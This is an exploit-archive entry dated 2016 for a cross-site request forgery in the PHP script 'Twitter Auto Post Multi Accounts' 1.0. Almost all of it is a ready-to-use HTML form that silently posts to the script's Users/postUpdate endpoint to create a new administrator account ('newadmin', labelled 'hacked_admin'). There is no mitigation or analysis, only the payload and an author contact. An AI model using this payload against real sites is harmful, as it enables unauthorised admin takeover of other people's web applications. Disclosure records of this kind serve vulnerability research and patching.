# Exploit Title: Twitter Auto Post Multi Accounts - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://codecanyon.net/item/twitter-auto-post-multi-accounts/16794863?s_rank=1
# Demo Page: http://tw.cozola.com/
# Version: 1.0
# Exploit:
< -- bug code started -- >
-->
<html>
<body>
<form action="[SITE]/index.php/Users/postUpdate" method="POST">
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="username" value="newadmin" />
<input type="hidden" name="password" value="newpass" />
<input type="hidden" name="repassword" value="newpass" />
<input type="hidden" name="fid" value="hacked_admin" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
< -- end of the bug code -- >
#########################
[+] Contact: http://twitter.com/muratyilmazlarr
-->